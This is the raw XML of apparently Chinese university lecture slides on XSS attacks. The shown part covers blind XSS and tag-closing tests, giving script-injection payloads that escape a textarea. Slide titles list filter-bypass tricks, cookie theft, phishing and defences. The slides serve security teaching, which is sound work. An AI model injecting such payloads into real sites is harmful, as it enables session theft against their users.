              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>盲打的结果是显示在管理员后端的，但是这并不意味着不存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>漏洞！只要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>被执行，就存在漏洞！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0540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进阶测试方法（一些攻击手段，将恶意代码嵌入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>页面被浏览器解析）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闭合标签测试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>
                <a:solidFill>
                  <a:srgbClr val="080808"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;alert(/XSS/)&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>textarea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&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，红色部分只会以纯文本展示</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>但是如果输入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>textarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;&lt;script&gt;alert(/XSS/)&lt;/script&gt;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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>textarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>textarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>script&gt;alert(/XSS/)&lt;/script&gt;…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1328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00TGp_natural_light">
  <a:themeElements>
    <a:clrScheme name="300TGp_natural_light 2">
      <a:dk1>
        <a:srgbClr val="4D4D4D"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="347436"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="DDDDDD"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="F28C1C"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="77AE26"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FFFFFF"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="404040"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="F7C5AB"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="6B9D21"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="449878"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="90A8B0"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="300TGp_natural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00TGp_natural_light 1">
        <a:dk1>
          <a:srgbClr val="000000"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="FFFFFF"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="51944E"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="DDDDDD"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="646ADE"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="1BAFC3"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="FFFFFF"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="000000"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="B8B9EC"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="179EB0"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="98BF1D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2">
        <a:dk1>
          <a:srgbClr val="4D4D4D"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="FFFFFF"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="347436"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="DDDDDD"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="F28C1C"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="77AE26"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="FFFFFF"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="404040"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="F7C5AB"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="6B9D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3">
        <a:dk1>
          <a:srgbClr val="000000"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="FFFFFF"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="1A578E"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="C0C0C0"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="5EB52D"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="F26D00"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="FFFFFF"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="000000"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="B6D7AD"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="DB6200"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="5983D7"/>
        </a:hlink>
        <a:folHlink>
          <a:srgbClr val="AAAD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Leaf</Template>
  <TotalTime>2459</TotalTime>
  <Words>1442</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>203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华文新魏</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>300TGp_natural_light</vt:lpstr>
      <vt:lpstr>第三讲 XSS攻击</vt:lpstr>
      <vt:lpstr>课程内容</vt:lpstr>
      <vt:lpstr>XSS攻击的原理</vt:lpstr>
      <vt:lpstr>举例：评价功能</vt:lpstr>
      <vt:lpstr>XSS攻击的分类</vt:lpstr>
      <vt:lpstr>XSS攻击的条件</vt:lpstr>
      <vt:lpstr>XSS攻击成功的条件</vt:lpstr>
      <vt:lpstr>漏洞测试的思路</vt:lpstr>
      <vt:lpstr>XSS进阶测试方法（一些攻击手段，将恶意代码嵌入html页面被浏览器解析）</vt:lpstr>
      <vt:lpstr>大小写混合测试</vt:lpstr>
      <vt:lpstr>多重嵌套测试</vt:lpstr>
      <vt:lpstr>宽字节绕过测试</vt:lpstr>
      <vt:lpstr>多标签测试</vt:lpstr>
      <vt:lpstr>XSS攻击的利用方式窃取Cookie（实验1） </vt:lpstr>
      <vt:lpstr>Cookie利用步骤</vt:lpstr>
      <vt:lpstr>网络钓鱼</vt:lpstr>
      <vt:lpstr>窃取客户端信息</vt:lpstr>
      <vt:lpstr>XSS漏洞的标准防护方法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Wei</dc:creator>
  <cp:lastModifiedBy>Claymore</cp:lastModifiedBy>
  <cp:revision>189</cp:revision>
  <cp:lastPrinted>1601-01-01T00:00:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">1601-01-01T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-11T03:07:56Z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